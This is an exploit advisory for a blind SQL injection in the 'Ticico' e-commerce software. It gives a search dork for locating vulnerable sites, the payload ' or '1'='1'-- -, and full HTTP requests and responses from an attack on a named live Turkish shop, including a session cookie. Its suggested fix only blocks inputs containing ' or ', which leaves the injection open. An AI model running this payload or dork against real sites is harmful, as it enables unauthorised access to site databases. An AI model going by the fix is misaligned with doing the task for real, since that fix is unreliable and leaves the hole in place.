Ticico - Blind SQL Injection

2024.02.20
tr Gaddar (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:"adminco" intext:"yetkili"

Author: Gaddar Recon Date: 18.02.2024 Vuln: SQL Injection(BLIND) Payload: data' or '1'='1'-- - Vulnerable File: init.php Tutorials video: https://www.youtube.com/watch?v=DaBWg1I86PE Tested on Windows 11 Professional with Burpsuite Community Edition v2023.12.1.5 Website: shop.beyoglucikolata.com.tr First secure request; POST /ajax HTTP/2 Host: shop.beyoglucikolata.com.tr Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c Content-Length: 49 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://shop.beyoglucikolata.com.tr Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://shop.beyoglucikolata.com.tr/search Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Priority: u=1, i type=search_suggestion&c_id=0&q=1&t=1708442363774 Response; HTTP/2 200 OK X-Powered-By: PHP/7.3.33 X-Powered-By: PleskLin Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 15:26:10 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000 <div class="search_suggestion"><span class="search_suggestion_error">Lütfen en az 3 karakter giriniz.</span></div> Vuln. Request; POST /ajax HTTP/2 Host: shop.beyoglucikolata.com.tr Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c Content-Length: 65 Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://shop.beyoglucikolata.com.tr Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://shop.beyoglucikolata.com.tr/search Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Priority: u=1, i type=search_suggestion&c_id=0&q=1' or '1'='1'-- -&t=1708442363774 Vuln. Response; HTTP/2 200 OK X-Powered-By: PHP/7.3.33 X-Powered-By: PleskLin Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 15:26:53 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000 <div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-sutlu-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-6">Beyoğlu Kek Aşkım - Sütlü Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/bitter-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-7">Bitter Çikolata Kaplamalı Fındık Kremalı Gofret 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/findikli-gofret-sutlu-cikolata-ve-findik-parcacik-kaplamali-kremali-gofret-33-gr-x-24-adet-p-8">Fındıklı Gofret - Sütlü Çikolata Ve Fındık Parçacık Kaplamalı Kremalı Gofret 33 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-krem-cikolata-13-findikli-kakaolu-findikli-krema-350-gr-p-9">Beyoğlu Krem Çikolata %13 Fındıklı - Kakaolu Fındıklı Krema 350 Gr</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fun-sutlu-cikolata-kapli-karamelli-nuga-bar-36-gr-x-24-adet-p-11">Beyoğlu Fun - Sütlü Çikolata Kaplı Karamelli Nuga Bar 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistik-cikolata-kapli-karamelli-yer-fistikli-nuga-bar-50-gr-x-24-adet-p-12">Beyoğlu Fıstık - Çikolata Kaplı Karamelli Yer Fıstıklı Nuga Bar 50 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-findiklim-findikli-sutlu-cikolata-38-gr-x-24-adet-p-13">Beyoğlu Fındıklım - Fındıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/butun-tane-findikli-sutlu-cikolata-30-gr-x-24-adet-p-14">Bütün Tane Fındıklı Sütlü Çikolata 30 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolata-cocorops-sutlu-cikolata-kapli-hindistan-cevizli-bar-50-gr-x-24-adet-p-15">Beyoğlu Çikolata Cocorops Sütlü Çikolata Kaplı Hindistan Cevizli Bar 50 GR x 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-dark-bitter-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-16">Beyoğlu Kek Aşkım Dark - Bitter Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistiklim-antep-fistikli-sutlu-cikolata-38-gr-x-24-adet-p-17">Beyoğlu Fıstıklım - Antep Fıstıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolatali-gofret-sutlu-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-18">Beyoğlu Çikolatalı Gofret - Sütlü Çikolata Kaplamalı Fındık Kremalı Gofret 36 GR x 24 Adet</a></div> How to fix this vulnerability? Add this code in init.php (init.php in main directory.) function kontrolEt($veri) { if (stripos($veri, " or ") !== false) { die("<center style='20px 0;font-size:22px;'>Girdiğiniz veriler tehlikeli içerikler barındırıyor. Lütfen yetkililerle iletişime geçiniz.</center>"); } else{ return null; } } if(route(1) != getAfterSlash(ADMIN_URL)){ foreach ($_REQUEST as $param => $value) { kontrolEt($value); } }

References:

https://www.youtube.com/watch?v=DaBWg1I86PE


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top